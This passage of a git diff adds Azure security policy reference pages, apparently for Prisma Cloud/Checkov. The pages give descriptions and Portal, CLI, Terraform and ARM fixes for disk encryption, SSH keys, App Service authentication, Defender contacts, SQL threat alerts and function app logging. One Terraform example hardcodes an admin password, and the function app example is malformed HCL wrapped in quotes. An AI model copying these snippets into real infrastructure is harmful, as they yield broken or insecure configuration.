+|xref:ensure-that-virtual-machines-use-managed-disks.adoc[Azure Linux and Windows Virtual Machines do not utilize Managed Disks]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py[CKV_AZURE_92]
+|LOW
+
+
+|xref:ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc[Azure SQL Server ADS Vulnerability Assessment (VA) is disabled]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml[CKV2_AZURE_2]
+|LOW
+
+
+|xref:ensure-the-key-vault-is-recoverable.adoc[Azure Key Vault is not recoverable]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py[CKV_AZURE_42]
+|MEDIUM
+
+
+|xref:ensure-virtual-machines-are-utilizing-managed-disks.adoc[Azure Virtual Machines do not utilize Managed Disks]
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml[CKV2_AZURE_9]
+|LOW
+
+
+|xref:set-an-expiration-date-on-all-keys.adoc[Azure Key Vault Keys do not have an expiration date]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/KeyExpirationDate.py[CKV_AZURE_40]
+|HIGH
+
+|===
+
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-1.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-1.adoc
new file mode 100644
index 000000000..155bed6d0
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-1.adoc
@@ -0,0 +1,183 @@
+== Azure VM data disk is not encrypted with ADE/CMK
+
+
+*Policy Details*
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 
564c3bcd-7b29-4e6a-9da9-e929876a9f1f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureManagedDiscEncryption.py[CKV_AZURE_2]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+*Description*
+
+
+Azure encrypts data disks by default using Server-Side Encryption (SSE) with platform-managed keys (SSE with PMK).
+It is recommended to use either SSE with Azure Disk Encryption (SSE with PMK+ADE) or a customer-managed key (SSE with CMK), which improves on platform-managed keys by giving you control of the encryption keys to meet your compliance needs.
+Encryption does not impact the performance of managed disks, and there is no additional cost for the encryption.
+////
+=== Fix - Runtime
+
+
+*Azure Portal To change the policy using the Azure Portal, follow these steps:*
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Select the *Management* tab and verify that you have a *Diagnostics Storage Account*.
++
+If you have no storage accounts, select *Create New*, give your new account a name, then select *OK*.
+
+. When the VM deployment is complete, select *Go to resource*.
+
+. On the left-hand sidebar, select *Disks*.
++
+On the Disks screen, select *Encryption*.
+
+. On the *Create key vault* screen, ensure that the *Resource Group* is the same as the one you used to create the VM.
+
+. Name your key vault.
+
+. On the *Access Policies* tab, check *Azure Disk Encryption* for *volume encryption*.
+
+. After the key vault has passed validation, select *Create*.
++
+Leave the *Key* field blank, then click *Select*.
+
+. At the top of the *Encryption* screen, click *Save*.
++
+A popup will warn you that the VM will reboot.
++
+Click *Yes*.
+
+
+*CLI Command*
+
+
+Encrypt your VM with az vm encryption, providing your unique Key Vault name to the --disk-encryption-keyvault parameter.
+
+
+[source,shell]
+----
+az vm encryption enable -g MyResourceGroup --name MyVM --disk-encryption-keyvault myKV
+
+## You can verify that encryption is enabled on your VM with az vm show
+az vm show --name MyVM -g MyResourceGroup
+
+## You will see the following in the returned output:
+## "EncryptionOperation": "EnableEncryption"
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_managed_disk
+* *Arguments:* encryption_settings - Is Encryption enabled on this Managed Disk?
+
+Changing this forces a new resource to be created.
+Add the encryption_settings block as shown:
+
+
+[source,go]
+----
+resource "azurerm_managed_disk" "example" {
+  name                 = var.disk_name
+  location             = var.location
+  resource_group_name  = var.resource_group_name
+  storage_account_type = var.storage_account_type
+  create_option        = "Empty"
+  disk_size_gb         = var.disk_size_gb
+
+  encryption_settings {
+    enabled = true
+  }
+
+  tags = var.common_tags
+}
+----
+
+
+*ARM Templates*
+
+
+* *Resource:* encryptionOperation
+* *Arguments:* EnableEncryption
+
+
+[source,json]
+----
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "vmName": {
+      "type": "string",
+      "metadata": {
+        "description": "Name of the virtual machine"
+      }
+    },
+    "volumeType": {
+      "type": "string",
+      "defaultValue": "Data",
+      "allowedValues": [
+        "Data"
+      ],
+      "metadata": {
+        "description": "Decryption is supported only on data drives for Linux VMs."
+      }
+    },
+    "sequenceVersion": {
+      "type": "string",
+      "defaultValue": "1.0",
+      "metadata": {
+        "description": "Pass in a unique value like a GUID every time the operation needs to be force run"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+
+  "variables": {
+    "extensionName": "AzureDiskEncryptionForLinux",
+    "extensionVersion": "0.1",
++   "encryptionOperation": "EnableEncryption",
+
+  ...
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-13.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-13.adoc
new file mode 100644
index 000000000..344253e4f
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-13.adoc
@@ -0,0 +1,54 @@
+== Azure Linux scale set does not use an SSH key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f948bf8a-0baf-40a1-8d76-8ac63c613243
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AzureScaleSetPassword.py[CKV_AZURE_49]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+The default option for a Linux scale set uses basic authentication as an access credential for the secure shell network protocol.
+Using SSH keys instead of common credentials (i.e., username and password) is the best way to secure your Linux scale sets against malicious activities such as brute-force attacks, by providing a level of authorization that can only be fulfilled by privileged users who own the private key associated with the public key created on these sets.
+An attacker may be able to get access to the Linux scale set's public key, but without the associated private key they will be unable to gain shell access to the server.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_linux_virtual_machine_scale_set
+* *Attribute:* disable_password_authentication
+
+
+[source,go]
+----
+resource "azurerm_linux_virtual_machine_scale_set" "example" {
+  ...
+~ disable_password_authentication = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-14.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-14.adoc
new file mode 100644
index 000000000..0ad19bac6
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-14.adoc
@@ -0,0 +1,54 @@
+== Virtual Machine extensions are installed
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 17e75f8f-fc17-4981-9580-9e9fce0aeee9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstanceExtensions.py[CKV_AZURE_50]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Ensure that your Microsoft Azure virtual machines (VMs) do not have extensions installed, in order to follow your organization's security and compliance requirements.
+Azure virtual machine extensions are small cloud applications that provide post-deployment configuration and automation tasks for virtual machines.
+These extensions run with administrative privileges and could potentially access any configuration file or piece of data on a virtual machine.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_virtual_machine, azurerm_linux_virtual_machine
+* *Arguments:* allow_extension_operations
+
+
+[source,go]
+----
+resource "azurerm_linux_virtual_machine" "example" {
+  ...
+~ allow_extension_operations = false
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2.adoc
new file mode 100644
index 000000000..351ee151b
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-2.adoc
@@ -0,0 +1,93 @@
+== Azure App Service Web app authentication is off
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5e94790e-0d8b-4001-b97f-b5f7670a9236
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py[CKV_AZURE_13]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Azure App Service Authentication is a feature that prevents anonymous HTTP requests from reaching the API app.
+Users with tokens are authenticated before they reach the API app.
+If an anonymous request is received from a browser, App Service redirects it to a logon page.
+To handle the logon process, select from a set of identity providers or implement a custom authentication mechanism.
+Enabling App Service Authentication allows every incoming HTTP request to pass through it before being handled by the application code.
+Authentication of users with specified providers (for example, Azure Active Directory, Facebook, Google, Microsoft Account, and Twitter) is handled.
+It also handles validation, storing, and refreshing of tokens, managing the authenticated sessions, and injecting identity information into request headers.
+////
+=== Fix - Runtime
+
+
+*Azure Portal To change the policy using the Azure Portal, follow these steps:*
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *App Services*.
+
+. Click each *App*.
+
+. 
Navigate to the *Settings* section, click *Authentication / Authorization*.
+
+. Set *App Service Authentication* to *On*.
+
+. Select additional parameters as per your requirements.
+
+. Click *Save*.
+
+
+*CLI Command*
+
+
+To set *App Service Authentication* for an existing app, use the following command:
+----
+az webapp auth update
+--resource-group <RESOURCE_GROUP_NAME>
+--name <APP_NAME>
+--enabled true
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* auth_settings:enabled
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ auth_settings {
++   enabled = true
+  ...
+  }
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3.adoc
new file mode 100644
index 000000000..1a4faf063
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-3.adoc
@@ -0,0 +1,116 @@
+== Azure Microsoft Defender for Cloud security contact phone
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e8799768-aeda-4d42-897a-29ede5798312
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py[CKV_AZURE_20]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Microsoft reaches out to the designated security contact in case its security team finds that the organization's resources are compromised.
+This ensures that the correct people are aware of any potential compromise and can mitigate the risk in a timely fashion.
+We recommend you provide a security contact phone number. Before taking any action, make sure that the information provided is valid, because the communication is not digitally signed.
+////
+=== Fix - Runtime
+
+
+*Azure Portal To change the policy using the Azure Portal, follow these steps:*
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to the *Security Center*.
+
+. Click *Security Policy*.
+
+. For the security policy subscription, click *Edit Settings*.
+
+. Click *Email notifications*.
+
+. Enter a valid security contact *Phone Number*.
+
+. Click *Save*.
+
+
+*CLI Command*
+
+
+To set a phone number for contact at the time of a potential security breach, use the following command:
+----
+az account get-access-token --query "{subscription:subscription,accessToken:accessToken}" --out tsv | xargs -L1 bash -c 'curl -X PUT -H "Authorization: Bearer $1" -H "Content-Type: application/json" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts/default1?api-version=2017-08-01-preview -d@"input.json"'
----
+Where _input.json_ contains the request body JSON data, detailed below.
+Replace _validEmailAddress_ with the email address (comma-separated for multiple addresses).
+Replace _phoneNumber_ with a valid phone number.
+
+
+[source,json]
+----
+{
+  "id": "/subscriptions/<Your_Subscription_Id>/providers/Microsoft.Security/securityContacts/default1",
+  "name": "default1",
+  "type": "Microsoft.Security/securityContacts",
+  "properties": {
+    "email": "<validEmailAddress>",
+    "phone": "<phone_number>",
+    "alertNotifications": "On",
+    "alertsToAdmins": "On"
+  }
+}
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_security_center_contact
+* *Arguments:* phone
+
+
+[source,go]
+----
+resource "azurerm_security_center_contact" "example" {
+  email = "contact@example.com"
+  phone = "+1-555-555-5555"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5.adoc
new file mode 100644
index 000000000..16c54d6c6
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-5.adoc
@@ -0,0 +1,109 @@
+== Azure Microsoft Defender for Cloud email notification for subscription owner is not set
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| fc914428-2c9a-4240-a3a7-769b85187278
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py[CKV_AZURE_22]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enabling security alert emails to subscription owners ensures that they receive security alert emails from Microsoft.
+This ensures that they are aware of any potential security issues and can mitigate the risk identified in a timely fashion.
+We recommend setting security alert emails to be sent to subscription owners.
+////
+=== Fix - Runtime
+
+
+*Azure Portal To change the policy using the Azure Portal, follow these steps:*
+
+
+
+. 
Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to the *Security Center*.
+
+. Click *Security Policy*.
+
+. Navigate to *Security Policy Subscription*, click *Edit Settings*.
+
+. Click *Email notifications*.
+
+. Set *Send email also to subscription owners* to *On*.
+
+. Click *Save*.
+
+
+*CLI Command*
+
+
+To set *Send email also to subscription owners* to *On*, use the following command:
+----
+az account get-access-token --query "{subscription:subscription,accessToken:accessToken}" --out tsv | xargs -L1 bash -c 'curl -X PUT -H "Authorization: Bearer $1" -H "Content-Type: application/json" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts/default1?api-version=2017-08-01-preview -d@"input.json"'
----
+Where *input.json* contains the request body JSON data, detailed below.
+Replace *validEmailAddress* with the email address (comma-separated for multiple addresses).
+Replace *phoneNumber* with a valid phone number.
+----
+{
+  "id": "/subscriptions/<Your_Subscription_Id>/providers/Microsoft.Security/securityContacts/default1",
+  "name": "default1",
+  "type": "Microsoft.Security/securityContacts",
+  "properties": {
+    "email": "<validEmailAddress>",
+    "phone": "<phone_number>",
+    "alertNotifications": "On",
+    "alertsToAdmins": "On"
+  }
+}
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_security_center_contact
+* *Arguments:* alerts_to_admins
+
+
+[source,go]
+----
+resource "azurerm_security_center_contact" "example" {
+  ...
++ alerts_to_admins = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-6.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-6.adoc
new file mode 100644
index 000000000..6577b34a5
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-6.adoc
@@ -0,0 +1,126 @@
+== Azure SQL Server threat detection alerts are not enabled for all threat types
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| cb84d42b-5935-4c37-a769-b2ec6c4c7995
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py[CKV_AZURE_25]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+// ,Runtime
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enabling all *Threat Detection Types* protects against SQL injection, database vulnerabilities, and any other anomalous activities.
+We recommend you enable all types of threat detection on SQL servers.
+
+////
+=== Fix - Runtime
+
+
+*Azure Portal To change the policy using the Azure Portal, follow these steps:*
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *SQL servers*.
+
+. For each server instance: a) Click *Advanced Data Security*.
++
+b) Navigate to the *Threat Detection Settings* section.
++
+c) Set *Threat Detection Types* to *All*.
+
+
+*CLI Command*
+
+
+To set each server's *ExcludedDetectionTypes* to *None*, use the following command:
+----
+Set-AzureRmSqlServerThreatDetectionPolicy
+-ResourceGroupName <resource group name>
+-ServerName <server name>
+-ExcludedDetectionType "None"
+----
+////
+=== Fix - Buildtime
+
+
+*ARM*
+
+
+* *Resource:* Microsoft.Sql/servers/databases
+
+
+[source,json]
+----
+{
+  "type": "Microsoft.Sql/servers/databases",
+  "apiVersion": "2020-08-01-preview",
+  "name": "[variables('dbName')]",
+  "location": "[parameters('location')]",
+  "sku": {
+    "name": "[parameters('sku')]"
+  },
+  "kind": "v12.0,user",
+  "properties": {
+    "collation": "SQL_Latin1_General_CP1_CI_AS",
+    "maxSizeBytes": "[mul(parameters('maxSizeMB'), 1048576)]",
+    "catalogCollation": "SQL_Latin1_General_CP1_CI_AS",
+    "zoneRedundant": false,
+    "readScale": "Disabled",
+    "storageAccountType": "GRS"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Sql/servers/databases/securityAlertPolicies",
+      "apiVersion": "2014-04-01",
+      "name": "[concat(variables('dbName'), '/current')]",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Sql/servers/databases', parameters('serverName'), parameters('databaseName'))]"
+      ],
+      "properties": {
++       "state": "Enabled",
++       "disabledAlerts": "",
+        "emailAddresses": "[variables('emailAddresses')[copyIndex()]]",
+        "emailAccountAdmins": "Enabled"
+      }
+    }
+  ]
+}
+----
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mssql_server_security_alert_policy
+* *Arguments:* disabled_alerts
+
+
+[source,go]
+----
+resource "azurerm_mssql_server_security_alert_policy" "example" {
+  ...
++ disabled_alerts = []
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-7.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-7.adoc
new file mode 100644
index 000000000..695dc7ad9
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-7.adoc
@@ -0,0 +1,128 @@
+== Azure SQL server 'Send alerts to' field value is not set
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 447412e1-8112-465f-8c61-4ce16971c062
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py[CKV_AZURE_26]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//,Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Provide the email address where alerts will be sent when anomalous activities are detected on SQL servers.
+Providing the email address to receive alerts ensures that any detection of anomalous activities is reported as soon as possible, enabling early mitigation of any potential risk detected.
+We recommend you add an email address to the *Send Alerts to* field value for MSSQL servers.
+////
+=== Fix - Runtime
+
+
+*Azure Portal To change the policy using the Azure Portal, follow these steps:*
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *SQL servers*.
+
+. For each server instance: a) Click *Advanced Threat Protection*.
++
+b) In *Send alerts to*, enter email addresses as appropriate.
+
+
+*CLI Command*
+
+
+To set each server's *Send alerts to*, use the following command:
+----
+Set-AzureRmSqlServerThreatDetectionPolicy
+-ResourceGroupName <resource group name>
+-ServerName <server name>
+-NotificationRecipientsEmails "<Recipient Email ID>"
+----
+////
+
+=== Fix - Buildtime
+
+
+
+
+*ARM*
+
+
+* *Resource:* Microsoft.Sql/servers/databases
+
+
+[source,json]
+----
+{
+  "type": "Microsoft.Sql/servers/databases",
+  "apiVersion": "2020-08-01-preview",
+  "name": "[variables('dbName')]",
+  "location": "[parameters('location')]",
+  "sku": {
+    "name": "[parameters('sku')]"
+  },
+  "kind": "v12.0,user",
+  "properties": {
+    "collation": "SQL_Latin1_General_CP1_CI_AS",
+    "maxSizeBytes": "[mul(parameters('maxSizeMB'), 1048576)]",
+    "catalogCollation": "SQL_Latin1_General_CP1_CI_AS",
+    "zoneRedundant": false,
+    "readScale": "Disabled",
+    "storageAccountType": "GRS"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Sql/servers/databases/securityAlertPolicies",
+      "apiVersion": "2014-04-01",
+      "name": "[concat(variables('dbName'), '/current')]",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Sql/servers/databases', parameters('serverName'), parameters('databaseName'))]"
+      ],
+      "properties": {
+        "state": "Enabled",
+        "disabledAlerts": "",
++       "emailAddresses": "[variables('emailAddresses')[copyIndex()]]",
+        "emailAccountAdmins": "Enabled"
+      }
+    }
+  ]
+}
+----
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mssql_server_security_alert_policy
+* *Arguments:* email_addresses
+
+
+[source,go]
+----
+resource "azurerm_mssql_server_security_alert_policy" "example" {
+  ...
++ email_addresses = ["example@gmail.com"]
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8.adoc
new file mode 100644
index 000000000..984429756
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8.adoc
@@ -0,0 +1,128 @@
+== Azure SQL Databases with disabled Email service and co-administrators for Threat Detection
+
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 561cd005-12dd-4bb4-b0c7-d6de31e76c69
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py[CKV_AZURE_27]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM,Terraform,Bicep,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enable Email Service and Co-administrators to receive security alerts from the SQL server.
+Providing the email address to receive alerts ensures that any detection of anomalous activities is reported as soon as possible, enabling early mitigation of any potential risk detected.
+////
+=== Fix - Runtime
+
+
+*Azure Portal To change the policy using the Azure Portal, follow these steps:*
+
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *SQL servers*.
+
+. For each server instance: a) Click *Advanced Data Security*.
++
+b) Navigate to the *Threat Detection Settings* section.
++
+c) Enable *Email service and co-administrators*.
+
+
+*CLI Command*
+
+
+To enable each server's *Email service and co-administrators* for MSSQL, use the following command:
+----
+Set-AzureRmSqlServerThreatDetectionPolicy
+-ResourceGroupName <resource group name>
+-ServerName <server name>
+-EmailAdmins $True
+----
+////
+
+=== Fix - Buildtime
+
+
+*ARM*
+
+
+* *Resource:* Microsoft.Sql/servers/databases
+
+
+[source,json]
+----
+{
+  "type": "Microsoft.Sql/servers/databases",
+  "apiVersion": "2020-08-01-preview",
+  "name": "[variables('dbName')]",
+  "location": "[parameters('location')]",
+  "sku": {
+    "name": "[parameters('sku')]"
+  },
+  "kind": "v12.0,user",
+  "properties": {
+    "collation": "SQL_Latin1_General_CP1_CI_AS",
+    "maxSizeBytes": "[mul(parameters('maxSizeMB'), 1048576)]",
+    "catalogCollation": "SQL_Latin1_General_CP1_CI_AS",
+    "zoneRedundant": false,
+    "readScale": "Disabled",
+    "storageAccountType": "GRS"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Sql/servers/databases/securityAlertPolicies",
+      "apiVersion": "2014-04-01",
+      "name": "[concat(variables('dbName'), '/current')]",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Sql/servers/databases', parameters('serverName'), parameters('databaseName'))]"
+      ],
+      "properties": {
+        "state": "Enabled",
+        "disabledAlerts": "",
+        "emailAddresses": "[variables('emailAddresses')[copyIndex()]]",
++       "emailAccountAdmins": "Enabled"
+      }
+    }
+  ]
+}
+----
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mssql_server_security_alert_policy
+* *Arguments:* email_account_admins
+
+
+[source,go]
+----
+resource "azurerm_mssql_server_security_alert_policy" "example" {
+  ...
++ email_account_admins = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc
new file mode 100644
index 000000000..720480de9
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc
@@ -0,0 +1,91 @@
+== Azure PostgreSQL Database Server 'Allow access to Azure services' enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 492e32db-49f1-495d-90f8-d1f84662d210
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml[CKV2_AZURE_6]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+When 'Allow access to Azure services' is enabled, the PostgreSQL Database server will accept connections from all Azure resources, as well as from other subscription resources.
+It is recommended to use firewall rules or VNET rules to allow access from specific network ranges or virtual networks.
+////
+=== Fix - Runtime
+
+
+*In Azure Console*
+
+
+
+. Login to the Azure console
+
+. Navigate to the 'Azure Database for PostgreSQL servers' dashboard
+
+. Select the reported PostgreSQL server
+
+. Go to 'Connection security' under 'Settings'
+
+. Select 'No' for 'Allow access to Azure services' under 'Firewall rules'
+
+. 
Click on 'Save'
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "azurerm_resource_group" "example" {
+  name     = "example-resources"
+  location = "West Europe"
+}
+
+
+resource "azurerm_sql_server" "sql_server_good" {
+  name                         = "mysqlserver"
+  resource_group_name          = azurerm_resource_group.example.name
+  location                     = "West US"
+  version                      = "12.0"
+  administrator_login          = "4dm1n157r470r"
+  administrator_login_password = "4-v3ry-53cr37-p455w0rd"
+}
+
+
+resource "azurerm_sql_firewall_rule" "firewall_rule_good" {
+  name                = "FirewallRule1"
+  resource_group_name = azurerm_resource_group.example.name
+  server_name         = azurerm_sql_server.sql_server_good.name
+  start_ip_address    = "10.0.17.62"
+  end_ip_address      = "10.0.17.62"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc
new file mode 100644
index 000000000..b55ee717f
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc
@@ -0,0 +1,71 @@
+== Azure Built-in logging for Azure function app is disabled
+// Azure Built-in logging for Azure function app disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c3c078fd-43db-4b13-b3f8-12b8da130e45
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py[CKV_AZURE_159]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+It is recommended to have a proper logging process for the Azure function app, in order to track configuration changes conducted manually and programmatically, and to trace back unapproved changes.
+ + +//*Runtime - Buildtime* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_function_app_slot +* *Arguments:* enable_builtin_logging + + +[source,go] +---- +{ + "resource "azurerm_function_app_slot" "pass2" { + name = "test-azure-functions-slot" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + function_app_name = azurerm_function_app.example.name + storage_account_name = azurerm_storage_account.example.name + storage_account_access_key = azurerm_storage_account.example.primary_access_key + enable_builtin_logging = true + site_config { + http2_enabled = false + } + + auth_settings { + enabled = false + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-client-certificates-are-enforced-for-api-management.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-client-certificates-are-enforced-for-api-management.adoc new file mode 